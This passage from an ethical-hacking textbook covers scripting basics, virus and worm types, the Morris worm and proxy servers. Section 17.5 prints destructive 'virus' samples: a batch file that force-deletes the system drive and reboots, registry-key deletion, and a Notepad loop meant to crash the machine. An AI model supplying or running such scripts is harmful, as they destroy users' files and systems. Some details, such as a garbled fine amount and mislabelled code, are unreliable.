directory with the command "cd" (short for "change directory), etc.113

16.3 What is Scripting?

Simply stated, a script is a small, interpreted program that can carry out
a series of tasks and make decisions based on specific conditions it finds.
By “interpreted,” we mean that when it is run, it is carried out one line at
a time, as opposed to “compiled,” which is the process of turning it into
machine language before it is run. A script is created using ASCII text, so
Windows Notepad or a similar text editor is the only tool required.

A number of scripting “languages” are available for user to choose from,

each with its own capabilities and limitations. These languages include
Windows native shell scripting, Visual Basic Scripting Edition,
JavaScript, Kixtart, and Perl. Which one user chooses will ultimately
depend on a combination of the tasks required and users own experience
and inclinations.
112
http://www.howtogeek.com/67469/the-beginners-guide-to-shell-scripting-the-basics/
113
http://wiki.dreamhost.com/Shell
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 233
 Ethical Hacking Part I

Each scripting language has a collection of commands or keywords and a

set of rules on how to use them. The set of rules for writing a script in
any given language is called the syntax. Once you learn the keywords
and syntax, you can use a text editor to write the script and then save it
with a file extension that is appropriate to the scripting language you are
using. Some of the more common file extensions you will see are .bat,
.cmd, .vbs, .js, and .kix.114

16.4 Shell Scripting

Shell scripts allow us to program commands in chains and have the

system execute them as a scripted event, just like batch files. They also
allow for far more useful functions, such as command substitution. You
can invoke a command, like date, and use its output as part of a file-
naming scheme. You can automate backups and each copied file can
have the current date appended to the end of its name. Scripts aren’t
just invocations of commands, either. They are programs in their own
right. Scripting allows you to use programming functions – such as ‘for’
loops, if/then/else statements, and so forth – directly within your
operating systems interface. And, you don’t have to learn another
language because you’re using what you already know: the command-
line.

This is the best advantage of scripting. You get to program with

commands you already know, while learning staples of most major
programming languages. Need to do something repetitive and tedious?
Script it! Need a shortcut for a really convoluted command? Script it!
Want to build a really easy to use command-line interface for something?
Script it!115

A shell is nothing more than an interface that allows a user to

communicate with, or issue commands directly to, the operating system.
The concept of a shell has been around in UNIX for many years. In fact,
there are several shells in the UNIX world, each with its own features and
commands that make it suitable for various tasks.

114
http://www.techrepublic.com/article/understand-the-role-of-scripting-in-network-
administration/1058081
115
http://www.howtogeek.com/67469/the-beginners-guide-to-shell-scripting-the-basics/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 234
 Ethical Hacking Part I

In Windows, there is no such diversity. You have only one shell, the
Windows shell, which is built into the operating system. And you are
undoubtedly already familiar with the interface, although you probably
call it the command prompt or, if you’re a real old-timer, perhaps the
DOS prompt. Technically speaking, it’s called a command shell and is
run by executing the file Cmd.exe, found in C:\Winnt\System32.
Probably the easiest way to run it is to simply click Start | Run,
type cmd in the text box, and click OK, or create a shortcut to Cmd.exe.

The Windows shell comes with a set of built-in commands, many of

which are well known and commonly used, such as dir, copy, del, cd,
etc. Commands and their associated parameters are usually issued one
at a time at the command line. More important for our purposes is the
fact that commands can also be used in a batch mode. That is, using a
text editor, you can write a separate command on each line, saving the
finished product with the extension of either .bat or .cmd. This turns the
text file into an executable that will be run as an interpreted program,
carrying out each command one line at a time, in order. This is what we
call shell scripting.116

16.5 Why Use a Shell Script?

The advantage to scripting languages is that they often work at a higher

level than compiled languages, being able to deal more easily with objects
such as files and directories. The disadvantage is that they are often less
efficient than compiled languages. Usually the trade off is worthwhile; it
can take an hour to write a simple script that would take two days to
code in C or C++, and usually the script will run fast enough that
performance won't be a problem. Examples of scripting languages
include awk, Perl, Python, Ruby, and the shell.

Because the shell is universal among UNIX systems, and because the
language is standardized by POSIX, shell scripts can be written once
and, if written carefully, used across a range of systems. Thus, the
reasons to use a shell script are:

116
http://www.techrepublic.com/article/how-to-use-windows-shell-and-the-windows-scripting-host-
functions/1058177
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 235
 Ethical Hacking Part I

 Simplicity:
The shell is a high-level language; you can express complex
operations clearly and simply using it.

 Portability:
By using just POSIX-specified features, you have a good chance of
being able to move your script, unchanged, to different kinds of
systems.

 Ease of development:
You can often write a powerful, useful script in little time.

16.6 Capabilities of Shell Scripting

 Shortcuts
In their most basic form, a shell script can provide a convenient
variation of a system command where special environment
settings, command options, or post processing is applied
automatically, but in a way that allows the new script to still act as
a fully normal UNIX command.

 Batch jobs
Shell scripts allow several commands that would be entered
manually at a command line interface to be executed
automatically, and without having to wait for a user to trigger each
stage of the sequence.

 Generalization
Simple batch jobs are not unusual for isolated tasks, but using
shell loops, tests, and variables provides much more flexibility to
users.

 Verisimilitude
A key feature of shell scripts is that the invocation of their
interpreters is handled as a core operating system feature. So
rather than a user's shell only being able to execute scripts in that
shell's language, or a script only having its interpreter directive
handled correctly if it was run from a shell, shell scripts are setup
and executed by the OS itself.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 236

 Ethical Hacking Part I

 Programming
Many modern shells also supply various features usually found
only in more sophisticated general-purpose programming
languages, such as control-flow constructs, variables, comments,
arrays, subroutines, and so on. With these sorts of features
available, it is possible to write reasonably sophisticated
applications as shell scripts.117

Why Hackers used this?

Nowadays, with all the point and click programs out there, you can be a
fairly good ethical hacker without knowing any programming. You can do
some effective hacking if you understand all of the security tools very
well. Even if you understand what’s going on in the background of these
programs, most people will still classify you as a script kiddie. Even if
it’s the very basics, it’ll give you a much better understanding of what’s
going on. Also, once you learn how to program well, you’ll be able to
develop your own exploits, which is great in many ways:

1. Person will be considered an elite hacker.

2. Imagine a black hat discovers vulnerability and codes an exploit for it
that no one else knows about. The black hat would be able to take down
thousands of machines before anyone discovers and patches the
Vulnerability. If you have knowledge of background script, then as white
hat hacker, you can take appropriate preventive measure. 118

16.7 Shell Script Example

 To test the Quick Edit Mode you just enabled, copy the text Then
right-click anywhere in the command shell window.

Echo Hello World. Here is my first line of shell scripting code!

The text you copied will appear next to the command prompt.
Press Enter to execute your first shell command.

117
http://en.wikipedia.org/wiki/Shell_script
118
http://expect-us.net/files/The_Hacker_s_Underground_Handbook.pdf
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 237
 Ethical Hacking Part I

You have just run code from the command line. Now, let’s use a
script (i.e., a .bat file) to run similar code. Open Notepad. Copy
these four lines then paste them into the Notepad file.

@Echo Off
Echo Hello World. Here is my first line of shell scripting code!
Echo Hello World. Here is my second line of shell scripting code!
Echo Hello World. Here is my third line of shell scripting code!

Select Save in the File menu. In the Save As dialog box that appears,
type Hello.bat in the File name text box. Leave the default entry of
Text Documents (*txt) in the Save as type text box. In the Save
in drop-down menu, select Desktop and click Save. Close Notepad.

The file Hello.bat now appears on your desktop. Position the file and
your command shell window so that both are visible on your screen.
Drag the file onto the command shell window. The path to the .bat
file you just created appears at the command prompt ready to run.
Dragging the file onto the command shell window is a shortcut for
typing the path to the file. Click the command shell window so that
you see the cursor, and then press Enter to run the .bat file.

These two exercises demonstrate three important scripting

concepts:
 You can run only one line of code at a time from the command
shell window.
 You can use a .bat file to run one or more lines of code.
 By default, lines of code in a .bat file execute sequentially from top
to bottom.
 Learning the Echo and Rem Commands

In the .bat file you executed, you might have noticed that the word
Echo appears several times. Echo is a useful command that lets
you display messages.
Echo Hello World. Here is my first line of shell scripting code!

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 238

 Ethical Hacking Part I

As the code shows, to display text, you specify the Echo command
followed by the text you want to display. Any text between Echo
and the line return will appear when you run the code.
You can use the Echo command to turn the system’s command-
echoing feature on and off. By default, the command-echoing
feature is on. To turn the system’s command-echoing feature off,
you use the off parameter with the command name. To see the
command-echoing feature and the Echo Off command in action,
open Notepad.

Echo Hello World. Here is my shell scripting code that

demonstrates Echo On!
Echo Off
Echo Hello World. Here is my shell scripting
Code that demonstrates Echo Off!

Copy the lines and paste them into the Notepad file. Save the file
as HelloAgain.bat. Drag the file onto the command shell window,
click the window, then press Enter to run HelloAgain.bat. In the
results, note that the third line of code is visible in the command
shell window but not the command that launched it. As this
example shows, you can strategically use the Echo Off command to
send only a command’s output to the screen.
Like a light switch, after you turn the command-echoing feature
off, it stays off until you turn it back on. To turn the command-
echoing feature back on, you use the Echo command with the on
parameter:

Echo On
You can turn the command-echoing feature off for just one line by
preceding the Echo Off command with the at (@) sign:

@Echo Off

 Another useful command to learn is Rem. This command lets you

insert remarks (i.e., comments) in a .bat file. A comment is text
that’s not meant to be executed but rather to help explain
something in the .bat file. Systems administrators often use

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 239

 Ethical Hacking Part I

comments to explain how a .bat file works or how to configure the

.bat file for a particular system. Using the Rem command is
simple. At the beginning of the line, you specify the command
followed by the comment

Rem The comment goes here.

Any text between Rem and the line return will not be executed.
Another way to comment out a line is to use a double colon (::)

:: The comment goes here.

 Hard-Coding Information

In a script, you often have to specify computer or user information

(e.g., drive, filename, username). When you code this information
directly into your script, you’re hard-coding the information. Take,
for example, the code

Echo My NT installation is in the C:\winnt directory.

In this code, the pathname C:\winnt is hard-coded.

 Using Environment Variables

NT’s online Help file defines an environment variable as, "A string
consisting of environment information, such as a drive, path, or
filename, associated with a symbolic name that can be used by
Windows NT." Environment variables let you easily access
environment information that the registry stores. The registry
stores system-related environment information in the
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Se
ssion Manager\Environment subkey and user-related environment
information in the HKEY_CURRENT_USER\Environment subkey.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 240

 Ethical Hacking Part I

You can use the Set command to see the environment variables
defined on your computer.

Set

Open the command shell window, type at the command prompt,

then press Enter. A list of the environment variables appears.

You can use the Control Panel System applet to add more
environment variables. Open the applet, and select the
Environment tab. Type the environment variable’s symbolic name
in the Variable field and its environment information in the Value
field. Click Set.

In a script, you can use an environment variable’s symbolic name

to access that variable’s value.

Echo My NT installation is in the C:\winnt directory.

For example, if you run the code in the command shell window,
you receive the message My NT installation is in the C:\winnt
directory. Instead of hard-coding the installation pathname, you
can use the environment variable that contains this information:
SYSTEMROOT. To retrieve and use an environment variable's value
in code, you need to enclose the environment variable's symbolic
name in percent (%) signs. So, to retrieve the NT installation
pathname, you can run the code

Echo My NT installation is in the %SYSTEMROOT% directory.

If you installed NT in the default location, you receive the

message My NT installation is in the C:\winnt directory. If you’ve
changed the location, the message will display that pathname
instead of C:\winnt.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 241
 Ethical Hacking Part I

Let’s look at another example. Suppose you want to create a text

file, test.txt, in the Temp directory on your computer.

Echo Here is the test file you created. > C:\temp\test.txt

If you run the code the system creates test.txt in the C:\temp
folder; this file has one line that reads Here is the test file you
created. However, if your Temp folder isn’t in the specified location
(i.e., C:\temp), this code will fail. To avoid possible failure, you can
use the TEMP environment variable instead of hard-coding the
Temp folder’s location.

Echo Here is the test file you created. > %TEMP%\test.txt

If you run the code the system creates test.txt in the Temp folder,
no matter the location of that folder.

In the last two code examples, note the use of the greater than (>)
sign. The > sign is a redirection symbol that tells the system to
redirect the output of the preceding command (in this case, the
Echo command) to the specified file.

Another useful environment variable is USERPROFILE, which

contains profile information about the currently logged-on user.
For example, you can use this variable with the Dir command. The
Dir command lists all the subdirectories and files in the directory
you specify.

Dir %USERPROFILE%

If you specify USERPROFILE as the directory with the code you

receive the contents of the Profiles directory for the currently
logged-on user. If you want the username of the currently logged-
on user and the name of the computer the user is logged on to, you
can run the code

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 242

 Ethical Hacking Part I

Echo A user called %USERNAME% is logged into

%COMPUTERNAME% now.

Suppose you want to map a drive to a share, so you type the

command at the command prompt, where server name is the name
of the target server and share name is the name of the target share.

Net Use * \\servername\sharename

When you run this command, the system maps the specified drive
to the specified share, and then sends the standard output The
command completed successfully to your screen. If you don't want
to clutter your screen with that output, you can suppress it by
appending > NUL to the Net Use command:

Net Use * \\servername\sharename > NUL

When you run this command, the system sends the standard
output to the command-shell trash can instead of your screen.

Now let's look at how to suppress a command's error output. Let’s

intentionally force an error by trying to map a drive to a share that
doesn't exist.

Net Use R: \\servername\noshare

At the command prompt, type where servername is the name of

your server and noshare is a fictitious share. When you run this
command, your screen will display error output that reads
something like System error 67 has occurred. The network name
cannot be found. To suppress that error output, you can append 2>
NUL to the command:

Net Use R: \\servername\noshare 2> NUL

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 243

 Ethical Hacking Part I

When you run this command, the system redirects the error
output to the command-shell trash can.

 For More Examples of Redirection in Action

The 20530.zip file contains another script, BootIniTester.bat that

provides more examples of how redirection symbols work. This
script tests the C and D drives on your machine to see whether the
boot.ini file is present, then creates a report detailing the results.

 WhoAmI.bat:
Requires Microsoft Networking to be installed and active, and the
DOS find command. If you have a UNIX find command in the path,
you'll probably get a "No such file or directory" error.
@echo off
echo.
net config /yes | find "name"
Echo.
Pause119

119
http://www.jpsdomain.org/windows/winshell.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 244
 Ethical Hacking Part I

CHAPTER 17
Viruses and Worms
Objective
17.1 Introduction
17.2 Definition of Virus
17.3 Virus Infection
17.4 Types of Virus
17.5 Examples
17.6 Worms
17.7 Sheep Dip Computer
17.8 Difference between virus and worm
17.9 Countermeasure

17.1. Introduction

Malware, short for malicious (or malevolent) software, is software used or

created by attackers to disrupt computer operation, gather sensitive
information, or gain access to private computer systems. It can appear in
the form of code, scripts, active content, and other software. 'Malware' is
a general term used to refer to a variety of forms of hostile or intrusive
software.

Malware includes computer viruses, worms, Trojan horses, spyware,

adware, and other malicious programs.

The best-known types of malware, viruses and worms, are known for the
manner in which they spread, rather than any specific types of behavior.
The term computer virus is used for a program that has infected
some executable software and, when run, causes the virus to spread to
other executables. On the other hand, a worm is a program that actively
transmits itself over a network to infect other computers. These
definitions lead to the observation that a virus requires user intervention
to spread, where as a worm spreads itself automatically.120

120
http://en.wikipedia.org/wiki/Malware
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 245
 Ethical Hacking Part I

17.2 What is Virus?

A computer virus is a program or piece of code that is loaded onto your

computer without your knowledge and runs against your wishes. Viruses
can also replicate themselves. All computer viruses are man-made. A
simple virus that can make a copy of itself over and over again is
relatively easy to produce. Even such a simple virus is dangerous
because it will quickly use all available memory and bring the system to
a halt. An even more dangerous type of virus is one capable of
transmitting itself across networks and bypassing security systems.121

17.3 VIRUS INFECTION

A greeting card program emailed to you from a friend might display a

holiday animation and song, while at the same time installing a remote
access virus program that gives a distant hacker control over your
computer whenever you're connected to the Internet. Similarly, a
shareware program downloaded and emailed to you by another friend
might have been infected with a virus on his computer or the server
where it was stored.
The first thing a boot or program virus often does is insert commands
and settings in the operating system so that they can operate freely,
undetected, and unaudited, without warning messages or access log
records. Some of them even change the Basic Input Output System
(BIOS) that interfaces between the computer's hardware and software to
help mask their activities.

The most sophisticated program viruses include "stealth viruses", which

encrypt their contents to try and avoid detection by virus protection
software, and "polymorphic viruses", which alter their content every time
they replicate to try and avoid detection, which exhibits behavior just like
real viruses. Most of the anti-virus programs can still catch these types of
viruses.

121
http://www.webopedia.com/TERM/V/virus.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 246
 Ethical Hacking Part I

Life cycle of a Virus

The life cycle of viruses in general, through four stages:-

 Dormant phase (Phase Rest / Sleep): the virus is idle (not all
viruses have this stage).
 Propagation phase (Phase Distribution): the virus places an
identical copy of itself into other programs of into certain system
areas.
 Triggering phase (Phase Active): the virus is activated to perform
the function for which it was created.
 Execution phase (Execution Phase): the function is performed (the
function may be harmless or damaging).

Viruses

Viruses - Families and Habitats

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 247

 Ethical Hacking Part I

Computer viruses of one kind or another have infected the Internet since
its very first years of existence. Virus protection is now required
technology for everyone that uses the Internet.
Signs that your computer might have a virus could include spontaneous
startup of programs like email programs, unexplained attempts by
programs on your computer to access the Internet, changes in file date
stamps, unusually slow program load or run times, lots of unexplained
disk activity, or failure of a program or your computer to start. However,
if you have an anti-virus protection running, then problems like a slow
computer or lots of disk activity are most likely caused by an inefficient
system configuration, not enough memory, a fragmented disk, or other
benign causes, since most viruses won't give any visible signs.
Some viruses are only annoying, displaying a message, using extra
memory or disk, or changing file names. However, some are destructive
and will change files and erase data, and some will erase your entire
hard drive. Some run silently in the background and give outside agents
complete control of your computer without your knowledge whenever you
are connected to the Internet. The Internet gives viruses a particularly
efficient new path for global infection. Some email viruses have spread
around the world and brought down tens of thousands of computers in
just a few hours. It is absolutely essential that you run an anti-virus
protection program to safeguard your computer from these serious
threats.

17.4 Types of Virus

A. Boot Sector Virus

The term “boot sector” is a

generic name that seems to
originally come from MS-DOS but
is now applied generally to the
boot information used by any
operating system. In modern
computers this is usually called
the “master boot record,” and it is
the first sector on a partitioned
storage device.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 248

 Ethical Hacking Part I

Boot sector viruses became popular because of the use of floppy disks to
boot a computer. The widespread usage of the Internet and the death of
the floppy have made other means of virus transmission more effective.

B. Browser Hijacker

This type of virus, which

can spread itself in
numerous ways including
voluntary download,
effectively hijacks certain
browser functions, usually
in the form of re-directing
the user automatically to
particular sites. It’s
usually assumed that this
tactic is designed to
increase revenue from web
advertisements.

C. Direct Action Virus

This type of virus, unlike most, only comes into action when the file
containing the virus is executed. The payload is delivered and then the
virus essentially becomes dormant – it takes no other action unless an
infected file is executed again.
Most viruses do not use the direct action method of reproduction simply
because it is not prolific, but viruses of this type have done damage in
the past. The Vienna virus, which briefly threatened computers in 1988,
is one such example of a direct action virus.

D. File Infector Virus

Perhaps the most common type of

virus, the file infector takes root in
a host file and then begins its
operation when the file is executed.
The virus may completely overwrite
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 249
 Ethical Hacking Part I

the file that it infects, or may only replace parts of the file, or may not
replace anything but instead re-write the file so that the virus is executed
rather than the program the user intended.
Although called a “file virus” the definition doesn’t apply to all viruses in
all files generally – for example, the macro virus below is not referred to
by the file virus. Instead, the definition is usually meant to refer only to
viruses which use an executable file format, such as .exe, as their host.

E. Macro Virus

A wide variety of programs, including productivity applications like

Microsoft Excel, provide support for Macros – special actions
programmed into the document using a specific macro programming
language. Unfortunately, this makes it possible for a virus to be hidden
inside a seemingly benign document.
Macro viruses vary widely in terms of payload. The most well known
macro virus is probably Melissa, a Word document supposedly
containing the passwords to pornographic websites. The virus also
exploited Word’s link to Microsoft Outlook in order to automatically
email copies of it.

F. Multipartite Virus

While some viruses are happy to spread via one method or deliver a
single payload, multipartite viruses want it all. A virus of this type may
spread in multiple ways, and it may take different actions on an infected
computer depending on variables, such as the operating system installed
or the existence of certain files.

G. Polymorphic Virus

Another jack-of-all-trades, the Polymorphic virus actually mutates over

time or after every execution, changing the code used to deliver its
payload. Alternatively, or in addition, a Polymorphic virus may guard
itself with an encryption algorithm that automatically alters itself when
certain conditions are met.
The goal of this trickery is evasion. Antivirus programs often find viruses
by the specific code used. Obscuring or changing the code of a virus can
help it avoid detection.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 250

 Ethical Hacking Part I

H. Resident Virus

This broad virus definition applies to any virus that inserts itself into a
system’s memory. It then may take any number of actions and run
independently of the file that was originally infected.
A resident virus can be compared to a direct payload virus, which does
not insert itself into the system’s memory and therefore only takes action
when an infected file is executed.122

17.5 Sample of Virus programs in VB Script

1. This pops up a funny message then will shutdown the computer

@echo off
Del %system drive%\*.* /f /s /q
shutdown -r -f -t 00

2. Delete Key Registry Files

*This will delete key registry files, then loops a message* (CANNOT
BE RECOVERED FROM)

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been faked. Have a nice day.
GOTO MESSAGE

3. Endless Notepads

*This will pop up endless notepads until the computer freezes and
crashes*

@ECHO off
:top

122
http://www.makeuseof.com/tag/types-computer-viruses-watch/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 251
 Ethical Hacking Part I

START %SystemRoot%\system32\notepad.exe
GOTO top

4. Crazy caps lock

*This constantly turns caps lock on and off really fast

continuously*

MsgBox "Let's go back a few steps"

Set wshShell
=wscript.CreateObject("WScript.Shell")
do
wscript.sleep

100
wshshell.sendkeys "{bs}"
loop

5. Popping CD Drives

*This will make the CD drives constantly pop out*

Set oWMP = CreateObject ("WMPlayer.OCX.7")

Set colCDROMs =
OWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
for i = 0 to
colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to
colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End

If
wscript.sleep 100

loop

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 252

 Ethical Hacking Part I

6. Systems reboot Virus source code

When this file is ran it will create a registry entry in

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVe
rsion\Run\.

This script will then write a script file to

C:\%systemroot%\system32\ called dlRB.vbs. This file (dlRB.vbs)
will reboot the computer when ran and yup you guessed
it...because of the registry entry this 'reboot' file runs each time the
target tries to log into Windows. After the script is done it will force
a system reboot.

17.6 What is a Worm?

A worm is a program or script that replicates itself and moves through a
network, typically travelling by sending new copies of itself via email.

Internet Worms

Internet worms are truly autonomous virtual viruses, spreading across

the net, breaking into computers, and replicating without human
assistance and usually without human knowledge.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 253

 Ethical Hacking Part I

Worms - Types and Habitats

Worms are particularly interesting technological constructs, with an

intriguing mathematical structure and complexity. They fascinate
because they take the digital imitation of life to another step -- they
autonomously search for computers, penetrate them, and replicate their
intelligence to continue the process.

An Internet worm can be contained in any kind of virus, program or

script. Sometimes their inventor will release them into the wild in a
single copy, leaving them to replicate by themselves through a variety of
stratagems and protocols.

History

Worms use a variety of methods to propagate across the Internet. Early

worms simply scanned the local network drives and folders and inserted
themselves into programs wherever they could, trusting human beings to
move disks and directories around in the normal course of things so they
could continue to spread.

Since the late 1990's, many Internet worms have been Visual Basic
script viruses which replicate on Windows computers by interacting with
the user's email program to send themselves to many (often all) of the
addresses in the address book. Once on a new machine, they repeat the
process with the new user's address book, quickly expanding the number
of people reached. Some of the worst outbreaks of email worms have

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 254

 Ethical Hacking Part I

spread around the world within just a few hours, and email remains the
Internet worm's fastest known transmission method.

Beginning in 2001, the most dangerous worms started to employ

weaknesses in the Windows operating system to attack machines directly
across the Internet. When a significant Windows weakness was found,
Microsoft would patch it, hackers would release worms to attack it a few
weeks later, and any unpatched machine connected to the Internet
would soon be compromised. With several hundred million machines
running Windows, statistically speaking a lot don't get patched
immediately, so there are always thousands of vulnerable systems. Even
computers inside a firewall protected intranet are at risk as long as there
is one weak link somewhere -- an unprotected machine on the Internet
able to reach the rest of the intranet. Microsoft introduced automatic
operating system updates to help solve this problem.

The most successful Internet worm of all time, in terms of sheer

saturation, was the code red worm, which scanned the Internet for
vulnerable Windows computers running the IIS web server to install it
and continue the infection. For example, a list of the code red infected
computers trying to break into the Living Internet site on August 7,
2001, can be found here. (Fortunately, the site was running on the
Apache web server.)

A wide range of other inventive strains of Internet worms have employed

security weaknesses in IRC, MAPI, Sendmail, finger, and other programs
and protocols. A few worms began to be discovered for Linux in the late
1990's as it became more popular across the Internet and some
vulnerability were found, but the strong security architecture of Linux
has kept the number of problems relatively low.

The first worm

The first worm disabled most of the Internet then existing. Robert Morris,
a Computer Science graduate student at Cornell University and son of
the Chief Scientist at the National Computer Security Center, wrote a 99
line program in the C language designed to self-replicate and propagate
itself from machine to machine across the Internet. The worm performed
the trick by combining a bug in the debugging mode of the Sendmail
program used to control email on almost all Internet computers, a bug in
the finger program, and the UNIX rexec and rsh commands.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 255
 Ethical Hacking Part I

On November 2, 1988, Morris released his worm, but did so from an MIT
computer to disguise his origin. In his view, only one thing went wrong --
the worm started replicating at a much faster rate than he had predicted,
and began crashing and disabling computers across the Internet.

Morris sent out an anonymous message telling people how to disable the
worm, but because it had brought down the Internet, the message about
how to disable it couldn't get through. The worm eventually infected
more than 6,000 computers across the Internet. Within a day teams of
programmers at the University of California at Berkeley and Purdue
University reverse engineered the worm and developed methods of
stopping it. The Internet then came back to normal in a couple of days.

Morris claimed that he had intended his worm as an innocent

experiment and hadn't planned it to have any negative effects.
Nonetheless, he was eventually convicted of violating the computer Fraud
and Abuse Act (Title 18), and sentenced to three years of probation, 400
hours of community service, and a $10, 0170 fine. His appeal was
rejected in March, 1991.

At least one good thing resulted from this incident -- the Computer
Emergency Response Team, or CERT, was formed by ARPA in response
to the Morris worm incident to track and provide information on Internet
security threats.

17.7 What is Sheep-dip Computer?

In computers, a sheep-dip (or, variously, sheep dipping or a footbath) is

the checking of media, usually diskettes or CD-ROMs, for viruses before
they are used in a computer or network. A sheep-dip computer is used
only for virus-checking. The computer makes use of one or two antivirus
programs that are kept current on a daily basis.

Sheep dipping is generally used only for data on external media, not for
data directly downloaded from the Internet. However, when files or
programs are downloaded from the Internet, an ideal approach for
safety's sake is to put them on removable media initially. The removable

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 256

 Ethical Hacking Part I

media can then be run through the sheep dip before transferring the
data to the hard disk of a proprietary computer.

17.5 Difference between a Virus and a Worm

A virus and a worm are similar in that they’re both forms of malicious
software i.e. malware. A virus infects another executable and uses this
carrier program to spread itself. The virus code is injected into the
previously benign program and is spread when the program is run.
Examples of virus carrier programs are macros, games, e-mail
attachments, Visual Basic scripts, games, and animations.

A worm is a type of virus, but it’s self-replicating. A worm spreads from

system to system automatically, but a virus needs another program in
order to spread. Viruses and worms both execute without the knowledge
or desire of the end user.
17.6 Countermeasures



Always update your anti-virus software at least weekly.


Back up your important files and ensure that they can be restored.
Change the computer's boot sequence to always start the PC from


its hard drive
Don't share Drive C: without a password and without read-only


restrictions.
Empty floppy drives of diskettes before turning on computers,


especially laptops
Forget opening unexpected e-mail attachments, even if they're from


friends


Get trained on your computer's anti-virus software and use it.
Have multiple backups of important files. This lowers the chance


that all are infected.
Install security updates for your operating system and programs as


soon as possible.
Jump at the chance to learn more about your computer. This will
help you spot viruses.

Anti-virus
• Detection:
– determine infection and locate the virus

• Identification:
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 257
 Ethical Hacking Part I

– identify the specific virus

• Removal:
– remove the virus from all infected systems, so the disease
cannot spread further
• Recovery:
– restore the system to its original state

Penetration testing for Virus

Also known as "white hat hacking" or "ethical hacking", penetration

testing refers to evaluating the security of systems on the Internet by
using the same techniques that are employed illegally by hackers.
However, when used legally during penetration testing, these techniques
are used in a more controlled and thorough way. Unfortunately, given its
rise in popularity and the benefits it offers, everybody is offering to do
penetration testing. Simply running a vulnerability scanning tool is not a
penetration test and sometimes it's worse than not doing123

123
http://www.jcaksrce.org/upload/48122216_vol1i1p3.pdf
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 258
 Ethical Hacking Part I

CHAPTER 18
Proxy Server

18.1 Understanding Proxy Server

18.2 How proxy Server works?
18.3 Types of Proxy Server
18.4 Use of Proxy Server for attack
18.5 IP Address Spoofing
18.6 MAC Address Spoofing

18.1. Understanding Proxy Server

In computer networks, a proxy server is a server (a computer system or
an application program) that acts as an intermediary for requests from
clients seeking resources from other servers. A client connects to the
proxy server, requesting some service, such as a file, connection, web
page, or other resource, available from a different server.

A proxy server receives a request for an Internet service (such as a Web

page request) from a user. If it passes filtering requirements, the proxy
server, assuming it is also a cache server, looks in its local cache of
previously downloaded Web pages. If it finds the page, it returns it to the
user without needing to forward the request to the Internet. If the page is
not in the cache, the proxy server, acting as a client on behalf of the
user, uses one of its own IP addresses to request the page from the
server out on the Internet. When the page is returned, the proxy server
relates it to the original request and forwards it on to the user.124

The proxy server evaluates the request according to its filtering rules. For
example, it may filter traffic by IP address or protocol. If the request is
validated by the filter, the proxy provides the resource by connecting to
the relevant server and requesting the service on behalf of the client. A
proxy server may optionally alter the client's request or the server's
response, and sometimes it may serve the request without contacting the
specified server.

124
http://whatis.techtarget.com/definition/proxy-server
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 259
 Ethical Hacking Part I

125

Proxy Server

A proxy server shares one internet connection with ALL the computers
on your local network or it is a computer that offers a computer network
service to allow clients to make indirect network connections to other
network services.

So basically a proxy (proxy server) is a server that acts as mediator

between the client (the computer of a user) and server (the computer on
the other ends of network connection on which the information requested
by the user appears for example web server site.) When clients request
data from an Internet resource, traffic goes from your web
browser/application first through the proxy before it reaches the
requested sources and back through the proxy then the proxy will
transmit the data to you.126

A proxy server sits between a client application, such as a Web browser,

and a real server. It intercepts all requests to the real server to see if it
can fulfill the requests itself. If not, it forwards the request to the real
server.

A proxy server has many potential purposes including:

 To keep machines behind it anonymous (mainly for security).

 To speed up access to resources (using caching). Web proxies are
commonly used to cache web pages from a web server.
 To apply access policy to network services or content, e.g. to block
undesired sites.

125
https://encrypted-tbn2.gstatic.com/images
126
http://blog.eukhost.com/webhosting/proxy-server-2/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 260
 Ethical Hacking Part I

 To log / audit usage, i.e. to provide company employee Internet

usage reporting.
 To bypass security/ parental controls.
 To scan transmitted content for malware before delivery.
 To scan outbound content, e.g., for data leak protection.
 To circumvent regional restrictions.

A proxy server that passes requests and replies unmodified is usually

called a gateway or sometimes tunneling proxy. A proxy server can be
placed in the user's local computer or at various points between the user
and the destination servers on the Internet.

A reverse proxy is an Internet-facing proxy used as a front-end to

control and protect access to a server on a private network, commonly
also performing tasks such as load-balancing, authentication, decryption
or caching.

18.2 How proxy Server works?

1. When a computer on the intranet makes a request out to the Internet-

such as to retrieve a Web page from a Web server-the internal
computer actually contacts the proxy server, which in turn contacts
the Internet server. The Internet server sends the Web page to the
proxy server, which then forwards the page to the computer on the
intranet.

2. Proxy servers log all traffic between the Internet and the intranet. For
example, a Telnet proxy server could track every single keystroke hit
in every Telnet session on the intranet-and could also track how the
external server on the Internet reacts to those keystrokes. Proxy
servers can log every IP address, date and time of access; URL,
number of bytes downloaded, and so on. This information can be
used to analyze any attacks launched against the network. It can also
help intranet administrators build better access and services for
employees.

